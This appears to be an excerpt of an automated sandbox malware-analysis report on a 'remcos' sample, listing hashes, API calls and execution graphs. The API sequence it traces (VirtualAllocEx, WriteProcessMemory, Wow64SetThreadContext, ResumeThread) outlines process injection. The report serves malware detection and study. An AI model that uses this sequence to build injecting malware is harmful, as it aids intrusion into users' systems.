                                              • Opcode Fuzzy Hash: 5ee8e6e3c227e8371c486cea163a4493ff9d5cd4975c2d3bd034ead2d2156138
                                              • Instruction Fuzzy Hash: DC2114B590024DDFDB10CF9AD884AEEBBF9FB48310F14801AE918A3350D374A950CFA4
                                              Function 02D3D5E8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 256 2d3d5e8-2d3d5eb 257 2d3d5f0-2d3d684 DuplicateHandle 256->257 258 2d3d686-2d3d68c 257->258 259 2d3d68d-2d3d6aa 257->259 258->259
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D3D5B6,?,?,?,?,?), ref: 02D3D677
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1679181318.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_2d30000_remcos.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: d54dc21ce086437ac0bf61ca37ff2c88b2ffcc7b710ca41565cdd9789f15be5b
                                              • Instruction ID: 7cc76f6e2a25cee44521fdbbe22101588afc7464f2dcdc10a5be335377d9fa84
                                              • Opcode Fuzzy Hash: d54dc21ce086437ac0bf61ca37ff2c88b2ffcc7b710ca41565cdd9789f15be5b
                                              • Instruction Fuzzy Hash: 8D2114B59002499FDB10CFAAD984ADEBBF5FB48310F14801AE958A3350D378A940CF64
                                              Function 07217921 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 262 7217921-72179b5 ReadProcessMemory 265 72179b7-72179bd 262->265 266 72179be-72179ee 262->266 265->266
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072179A8
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: ee3c2ed64d601c7463522ab38ffec3a8e8bdee15c2f4371f0aae348c0823ff71
                                              • Instruction ID: 335a0df998b3a2beaccdd4ed3922fa3d019dbd05b421e9bec69d6d1363fd5025
                                              • Opcode Fuzzy Hash: ee3c2ed64d601c7463522ab38ffec3a8e8bdee15c2f4371f0aae348c0823ff71
                                              • Instruction Fuzzy Hash: 94214AB1800349DFDB10CFA9C881BEEBBF5FF48310F10842AE558A7240D7799A45CBA1
                                              Function 072176A0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 270 72176a0-72176eb 272 72176fb-721772b Wow64SetThreadContext 270->272 273 72176ed-72176f9 270->273 275 7217734-7217764 272->275 276 721772d-7217733 272->276 273->272 276->275
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0721771E
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 5df701789c467ec75204afe086d95eedaa37b600aeddc29c383cd91d802ef607
                                              • Instruction ID: e226d612f716b4ced757eca921f5f23e61deb18183c2b45c077ae8c18c0bf6de
                                              • Opcode Fuzzy Hash: 5df701789c467ec75204afe086d95eedaa37b600aeddc29c383cd91d802ef607
                                              • Instruction Fuzzy Hash: 812147B591030A8FDB10CFAAC4857EEBBF4FF98214F14842AD459A7340CB789A45CFA1
                                              Function 07217928 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 280 7217928-72179b5 ReadProcessMemory 283 72179b7-72179bd 280->283 284 72179be-72179ee 280->284 283->284
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072179A8
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: ff870f82877ea03c4457bc5d0397429d2eec9954be5dd6647fc2f5ffdda1a112
                                              • Instruction ID: 2a78a689190dd30983d7697b5f6bf712f5369267d9ca6e763180df68d0e30b26
                                              • Opcode Fuzzy Hash: ff870f82877ea03c4457bc5d0397429d2eec9954be5dd6647fc2f5ffdda1a112
                                              • Instruction Fuzzy Hash: 352139B18003499FDB10CFAAC885BEEFBF5FF48310F54842AE558A7240D7799A44CBA1
                                              Function 07217770 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 288 7217770-72177f3 VirtualAllocEx 291 72177f5-72177fb 288->291 292 72177fc-7217821 288->292 291->292
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072177E6
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 80f79db87a99d3aa9271e016c050b4b7d060ebf4e8b4967388e31e1c6fa38a4c
                                              • Instruction ID: 15214e9cea5b51d2b62739f0d642985b7719a66a8d6bee141e1058cac2e490df
                                              • Opcode Fuzzy Hash: 80f79db87a99d3aa9271e016c050b4b7d060ebf4e8b4967388e31e1c6fa38a4c
                                              • Instruction Fuzzy Hash: 821156B6800209CFDB10DFA9C8457EEBBF5FF48310F24881AE559A7250CB799A55CFA0
                                              Function 07217778 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 296 7217778-72177f3 VirtualAllocEx 299 72177f5-72177fb 296->299 300 72177fc-7217821 296->300 299->300
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072177E6
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 30ce6f645237f2355609273297028c2cd1b69f434125e2c0a98a2fc9c701a56c
                                              • Instruction ID: 3d30dbf219e036f46a3559fddadcbf3e82302de9dea8fe91279b8240f5e3e01c
                                              • Opcode Fuzzy Hash: 30ce6f645237f2355609273297028c2cd1b69f434125e2c0a98a2fc9c701a56c
                                              • Instruction Fuzzy Hash: 6F1137768003499FDB10DFAAC845BDEBBF5FF88310F148419E559A7250CB759950CFA1
                                              Function 02D3A02C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,02D3AD24), ref: 02D3AF5E
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1679181318.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_2d30000_remcos.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 122ba22f42e0b7b30d5a981631f5554d5b4f9c9531b8d0d38c2594f029db90d7
                                              • Instruction ID: 68a901c6e052f2f499809ecabf59c9e1a340b1cd0c75d721eca5f92107a7a4f9
                                              • Opcode Fuzzy Hash: 122ba22f42e0b7b30d5a981631f5554d5b4f9c9531b8d0d38c2594f029db90d7
                                              • Instruction Fuzzy Hash: 941102B6D006498FDB10CF9AC444BDEFBF4EB48214F10846AE499A7750D379A945CFA1
                                              Function 072171B3 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 5a6fdfc877f549c40ca060ec6d33130d1bf09215b306c1533efa62150352bcf1
                                              • Instruction ID: c54f5e71e54fe8e4ca504266ed680bdb2814f00b1ef8ca985f065ffe172e757e
                                              • Opcode Fuzzy Hash: 5a6fdfc877f549c40ca060ec6d33130d1bf09215b306c1533efa62150352bcf1
                                              • Instruction Fuzzy Hash: 561128B5D003498BDB10DFA9C8457EEBBF5EF88210F24882AD559A7240CB7955458BA4
                                              Function 072171B8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: b7585fbed0bbf1e8691524fa011d12037fb138f874fa3c6f34c51ad2665dbd24
                                              • Instruction ID: ea524ebc7e1b7adc2bcda0f1beec69ba71455178b7b3a81be6fcf99616a0ed71
                                              • Opcode Fuzzy Hash: b7585fbed0bbf1e8691524fa011d12037fb138f874fa3c6f34c51ad2665dbd24
                                              • Instruction Fuzzy Hash: 17116AB18003498FDB10DFAAC4457DEFBF4EF88210F148419D419A7340C7796940CFA4
                                              Function 07214460 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0721B195
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 5e55a8e49e914399c7762c6ce1a21c73954b47f518d6b7e5f293fa5ea7751da9
                                              • Instruction ID: 341d0f36e7ba2395afe8c8d29e7bff2d800cb9f57d48787ac1e788851d393644
                                              • Opcode Fuzzy Hash: 5e55a8e49e914399c7762c6ce1a21c73954b47f518d6b7e5f293fa5ea7751da9
                                              • Instruction Fuzzy Hash: 3211F2B58103499FDB10DF9AC885BDEBBF8FB58320F11881AE958A7250D375A944CFA1
                                              Function 0721B136 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0721B195
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 5ea07ec432cea9397812bd7a38ca7115ccbeea7fc8867833fcadd59c8110a12a
                                              • Instruction ID: c8197ca911c29ad8d7f31b78f9efbc548bd6db5acd3176de8408938388c3dd2e
                                              • Opcode Fuzzy Hash: 5ea07ec432cea9397812bd7a38ca7115ccbeea7fc8867833fcadd59c8110a12a
                                              • Instruction Fuzzy Hash: 2511E2B9800349DFDB10CF99C985BDEBBF8FB58310F11881AD558A7640C375A944CFA1
                                              Function 0721B131 Relevance: 1.5, APIs: 1, Instructions: 39windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0721B195
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 44df0933c0c8b003bbe5d1f1755c4aa0bd5086ce39fbcb217bf35e4fd8c36ad9
                                              • Instruction ID: 6440aa68ea337de6c54e0096ec6f509221f1ebd6c793c7020f1b70ef50230439
                                              • Opcode Fuzzy Hash: 44df0933c0c8b003bbe5d1f1755c4aa0bd5086ce39fbcb217bf35e4fd8c36ad9
                                              • Instruction Fuzzy Hash: DE0104B58103498FDB10CF89D484BDEFBF4FB58314F21884AD559A7210C3B4A544CFA1
                                              Function 0122D3D8 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1677056328.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_122d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b78a1858bd04612b2cf22dd70e908d11d352dd16154415fd505ff40c3424a3d6
                                              • Instruction ID: 5b5e6e5b8f57a79adcf45c02119144a3c1bc4f83412246963be840bfafe33738
                                              • Opcode Fuzzy Hash: b78a1858bd04612b2cf22dd70e908d11d352dd16154415fd505ff40c3424a3d6
                                              • Instruction Fuzzy Hash: B0216775514348EFDB05DF84C9C0B6ABB65FB88324F24C16DE90A0B247C376E446CBA2
                                              Function 0123D1D4 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1677129504.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_123d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e1d66ef2bf22ee8aa2ad85e58c9473e8ac0a016ab2a84053592867c9bf7678bf
                                              • Instruction ID: 79420f7779e2a09527c4a4a574f872d46d1395ff90b7e9a9d47460154022312c
                                              • Opcode Fuzzy Hash: e1d66ef2bf22ee8aa2ad85e58c9473e8ac0a016ab2a84053592867c9bf7678bf
                                              • Instruction Fuzzy Hash: 352137B1524308DFDB01DF94C5C0B25BB65FBC4324F64C56DE9094B283C776D806CA61
                                              Function 0123D01C Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1677129504.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_123d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83b53722707b5f74c9b6ac445e7c400e1de96258d55ad2023ae6e17421a45247
                                              • Instruction ID: 4e92772379af90e0e9667d59318ca89136832ef9441eb043998ab2662271e339
                                              • Opcode Fuzzy Hash: 83b53722707b5f74c9b6ac445e7c400e1de96258d55ad2023ae6e17421a45247
                                              • Instruction Fuzzy Hash: 352100B1614348DFDB15DFA4D8C0B26FB65FB84B14F64C569E90A4B282C376D807CA62
                                              Function 0123D006 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1677129504.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_123d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1da43bd095657f2ef3259ca27cbd77ed819846956518aae676a5088dee402215
                                              • Instruction ID: c99c9645875b7e587dea289eab0f043165327bc5ce5f439fc3a798e25b921594
                                              • Opcode Fuzzy Hash: 1da43bd095657f2ef3259ca27cbd77ed819846956518aae676a5088dee402215
                                              • Instruction Fuzzy Hash: D321B3B14083849FCB02CF64D994711BF71EB86314F28C5DAD9498F2A7C33A9806CB62
                                              Function 0122D3D3 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1677056328.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_122d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction ID: 0c2cedea8ccc69839a6e330f8a389d8668799a7572c784d67f1a088e08dd3f83
                                              • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction Fuzzy Hash: 64110376404284DFDB12CF44D9C0B9ABF71FB84324F24C2A9D9090B657C33AE456CBA1
                                              Function 0123D1CF Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1677129504.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_123d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction ID: 652fb42ef3662e997fe01e63a0c6d3bd74b83d8597667452a5b80241330c423e
                                              • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction Fuzzy Hash: B611BBB5504284DFDB02CF54C5C0B15BBA1FB84224F28C6AAD9494B697C33AD44ACB61
                                              Function 0122D759 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1677056328.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_122d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 26c9b6a680868ef9582b242b0269aa524b42bb4bcbefadf339026fc9d9f3383a
                                              • Instruction ID: 62bd96e6aa2d001e81b5ed0092a5f5e911282e1f2e3e70b0060e2471e067a574
                                              • Opcode Fuzzy Hash: 26c9b6a680868ef9582b242b0269aa524b42bb4bcbefadf339026fc9d9f3383a
                                              • Instruction Fuzzy Hash: 8901DB31114398AFF7148E95DD84B6AFFD8DF41260F18C45AEE094A286C77D9840C672
                                              Function 0122D758 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1677056328.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_122d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 93e251bf961a165395f08aacb2f13c3fc255bc2f55f451335b77e0006e6fe2ae
                                              • Instruction ID: 4b339c3aab43880084bea6ec290e226a6d1712fc3f612d8895e4314c3468bd5b
                                              • Opcode Fuzzy Hash: 93e251bf961a165395f08aacb2f13c3fc255bc2f55f451335b77e0006e6fe2ae
                                              • Instruction Fuzzy Hash: 44F0C231004384AEE7148E0ADD84B66FFA8EF50724F18C45AEE080A287C279A840CAB1

                                              Execution Graph

                                              Execution Coverage:10.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:254
                                              Total number of Limit Nodes:11
                                              execution_graph 34962 3004040 34963 3004082 34962->34963 34965 3004089 34962->34965 34964 30040da CallWindowProcW 34963->34964 34963->34965 34964->34965 35220 3006be0 35221 3006bf8 35220->35221 35234 30068b0 35221->35234 35223 3006c28 35224 30068b0 CreateWindowExW 35223->35224 35225 3006c46 35224->35225 35239 30068d0 35225->35239 35228 30068d0 CreateWindowExW 35229 3006ca0 35228->35229 35231 3006f0e 35229->35231 35232 1325ca4 CreateWindowExW 35229->35232 35243 1328268 35229->35243 35230 300767b 35232->35230 35235 30068bb 35234->35235 35236 300767b 35235->35236 35237 1325ca4 CreateWindowExW 35235->35237 35238 1328268 CreateWindowExW 35235->35238 35236->35223 35237->35236 35238->35236 35240 30068db 35239->35240 35248 3006ba0 35240->35248 35242 3006c82 35242->35228 35245 1328273 35243->35245 35244 1328569 35244->35230 35245->35244 35246 132ccd7 CreateWindowExW 35245->35246 35247 132ccc8 CreateWindowExW 35245->35247 35246->35244 35247->35244 35249 3006bab 35248->35249 35250 3008c32 35249->35250 35251 1325ca4 CreateWindowExW 35249->35251 35252 1328268 CreateWindowExW 35249->35252 35250->35242 35251->35250 35252->35250 35253 3008be0 35254 3008bf0 35253->35254 35255 3006ba0 CreateWindowExW 35254->35255 35256 3008bff 35255->35256 34966 132d5f0 DuplicateHandle 34967 132d686 34966->34967 35126 132cfa0 35127 132cfe6 GetCurrentProcess 35126->35127 35129 132d038 GetCurrentThread 35127->35129 35133 132d031 35127->35133 35130 132d075 GetCurrentProcess 35129->35130 35131 132d06e 35129->35131 35132 132d0ab 35130->35132 35131->35130 35134 132d0d3 GetCurrentThreadId 35132->35134 35133->35129 35135 132d104 35134->35135 35257 132ac10 35261 132ad08 35257->35261 35266 132acf9 35257->35266 35258 132ac1f 35262 132ad3c 35261->35262 35263 132ad19 35261->35263 35262->35258 35263->35262 35264 132af40 GetModuleHandleW 35263->35264 35265 132af6d 35264->35265 35265->35258 35267 132ad19 35266->35267 35268 132ad3c 35266->35268 35267->35268 35269 132af40 GetModuleHandleW 35267->35269 35268->35258 35270 132af6d 35269->35270 35270->35258 35271 74eaeb8 35272 74eb043 35271->35272 35274 74eaede 35271->35274 35274->35272 35275 74e4460 35274->35275 35276 74eb138 PostMessageW 35275->35276 35277 74eb1a2 35276->35277 35277->35274 35278 74e8079 35279 74e7edc 35278->35279 35280 74e815b 35279->35280 35281 74e9c9e 12 API calls 35279->35281 35282 74e9c28 12 API calls 35279->35282 35283 74e9c38 12 API calls 35279->35283 35281->35280 35282->35280 35283->35280 35136 1324668 35137 1324672 35136->35137 35141 1324758 35136->35141 35146 1323e34 35137->35146 35139 132468d 35142 132477d 35141->35142 35150 1324868 35142->35150 35154 1324858 35142->35154 35147 1323e3f 35146->35147 35162 1325c24 35147->35162 35149 1326faf 35149->35139 35152 132488f 35150->35152 35151 132496c 35151->35151 35152->35151 35158 13244b4 35152->35158 35156 132488f 35154->35156 35155 132496c 35156->35155 35157 13244b4 CreateActCtxA 35156->35157 35157->35155 35159 13258f8 CreateActCtxA 35158->35159 35161 13259bb 35159->35161 35163 1325c2f 35162->35163 35166 1325c44 35163->35166 35165 1327055 35165->35149 35167 1325c4f 35166->35167 35170 1325c74 35167->35170 35169 132713a 35169->35165 35171 1325c7f 35170->35171 35174 1325ca4 35171->35174 35173 132722d 35173->35169 35176 1325caf 35174->35176 35175 1328569 35175->35173 35176->35175 35179 132ccd7 35176->35179 35184 132ccc8 35176->35184 35180 132ccf9 35179->35180 35181 132cd1d 35180->35181 35189 132ce77 35180->35189 35193 132ce88 35180->35193 35181->35175 35185 132cd34 35184->35185 35186 132cd60 35185->35186 35187 132ce77 CreateWindowExW 35185->35187 35188 132ce88 CreateWindowExW 35185->35188 35186->35175 35187->35186 35188->35186 35191 132ce95 35189->35191 35190 132cecf 35190->35181 35191->35190 35197 132ba40 35191->35197 35195 132ce95 35193->35195 35194 132cecf 35194->35181 35195->35194 35196 132ba40 CreateWindowExW 35195->35196 35196->35194 35198 132ba4b 35197->35198 35200 132dbe8 35198->35200 35201 132d23c 35198->35201 35200->35200 35202 132d247 35201->35202 35203 1325ca4 CreateWindowExW 35202->35203 35204 132dc57 35203->35204 35208 132f9e8 35204->35208 35214 132f9d0 35204->35214 35205 132dc91 35205->35200 35210 132fa19 35208->35210 35211 132fb19 35208->35211 35209 132fa25 35209->35205 35210->35209 35212 30009b0 CreateWindowExW 35210->35212 35213 30009c0 CreateWindowExW 35210->35213 35211->35205 35212->35211 35213->35211 35216 132fa19 35214->35216 35217 132fb19 35214->35217 35215 132fa25 35215->35205 35216->35215 35218 30009b0 CreateWindowExW 35216->35218 35219 30009c0 CreateWindowExW 35216->35219 35217->35205 35218->35217 35219->35217 34968 74e8200 34969 74e8180 34968->34969 34974 74e9c9e 34969->34974 34990 74e9c38 34969->34990 35005 74e9c28 34969->35005 34970 74e82b3 34975 74e9c2c 34974->34975 34977 74e9ca1 34974->34977 34976 74e9c5a 34975->34976 35020 74ea6e6 34975->35020 35025 74ea355 34975->35025 35030 74ea954 34975->35030 35035 74ea454 34975->35035 35039 74ea0f9 34975->35039 35044 74ea159 34975->35044 35049 74ea398 34975->35049 35054 74ea2bd 34975->35054 35059 74ea2dd 34975->35059 35064 74ea25f 34975->35064 35069 74ea17e 34975->35069 35073 74ea205 34975->35073 34976->34970 34977->34970 34991 74e9c52 34990->34991 34992 74e9c5a 34991->34992 34993 74ea6e6 2 API calls 34991->34993 34994 74ea205 2 API calls 34991->34994 34995 74ea17e 2 API calls 34991->34995 34996 74ea25f 2 API calls 34991->34996 34997 74ea2dd 2 API calls 34991->34997 34998 74ea2bd 2 API calls 34991->34998 34999 74ea398 2 API calls 34991->34999 35000 74ea159 2 API calls 34991->35000 35001 74ea0f9 2 API calls 34991->35001 35002 74ea454 2 API calls 34991->35002 35003 74ea954 2 API calls 34991->35003 35004 74ea355 2 API calls 34991->35004 34992->34970 34993->34992 34994->34992 34995->34992 34996->34992 34997->34992 34998->34992 34999->34992 35000->34992 35001->34992 35002->34992 35003->34992 35004->34992 35006 74e9c52 35005->35006 35007 74e9c5a 35006->35007 35008 74ea6e6 2 API calls 35006->35008 35009 74ea205 2 API calls 35006->35009 35010 74ea17e 2 API calls 35006->35010 35011 74ea25f 2 API calls 35006->35011 35012 74ea2dd 2 API calls 35006->35012 35013 74ea2bd 2 API calls 35006->35013 35014 74ea398 2 API calls 35006->35014 35015 74ea159 2 API calls 35006->35015 35016 74ea0f9 2 API calls 35006->35016 35017 74ea454 2 API calls 35006->35017 35018 74ea954 2 API calls 35006->35018 35019 74ea355 2 API calls 35006->35019 35007->34970 35008->35007 35009->35007 35010->35007 35011->35007 35012->35007 35013->35007 35014->35007 35015->35007 35016->35007 35017->35007 35018->35007 35019->35007 35021 74ea6ec 35020->35021 35078 74e71b3 35021->35078 35082 74e71b8 35021->35082 35022 74ea737 35022->34976 35026 74ea362 35025->35026 35028 74e71b8 ResumeThread 35026->35028 35029 74e71b3 ResumeThread 35026->35029 35027 74ea737 35027->34976 35028->35027 35029->35027 35031 74eaa89 35030->35031 35086 74e7698 35031->35086 35090 74e76a0 35031->35090 35032 74eaaa4 35037 74e7698 Wow64SetThreadContext 35035->35037 35038 74e76a0 Wow64SetThreadContext 35035->35038 35036 74ea46e 35037->35036 35038->35036 35040 74ea10c 35039->35040 35094 74e7ab4 35040->35094 35098 74e7ac0 35040->35098 35045 74ea165 35044->35045 35046 74eaa17 35045->35046 35102 74e7838 35045->35102 35106 74e7830 35045->35106 35050 74ea2e4 35049->35050 35110 74e7928 35050->35110 35114 74e7921 35050->35114 35051 74ea1e2 35051->35051 35055 74ea2c3 35054->35055 35057 74e7838 WriteProcessMemory 35055->35057 35058 74e7830 WriteProcessMemory 35055->35058 35056 74ea5b7 35057->35056 35058->35056 35060 74ea2e3 35059->35060 35061 74ea1e2 35060->35061 35062 74e7928 ReadProcessMemory 35060->35062 35063 74e7921 ReadProcessMemory 35060->35063 35062->35061 35063->35061 35065 74ea322 35064->35065 35118 74e7778 35065->35118 35122 74e7770 35065->35122 35066 74ea340 35071 74e7838 WriteProcessMemory 35069->35071 35072 74e7830 WriteProcessMemory 35069->35072 35070 74ea1ac 35070->34976 35071->35070 35072->35070 35074 74ea165 35073->35074 35074->35073 35075 74eaa17 35074->35075 35076 74e7838 WriteProcessMemory 35074->35076 35077 74e7830 WriteProcessMemory 35074->35077 35076->35074 35077->35074 35079 74e71b8 ResumeThread 35078->35079 35081 74e7229 35079->35081 35081->35022 35083 74e71f8 ResumeThread 35082->35083 35085 74e7229 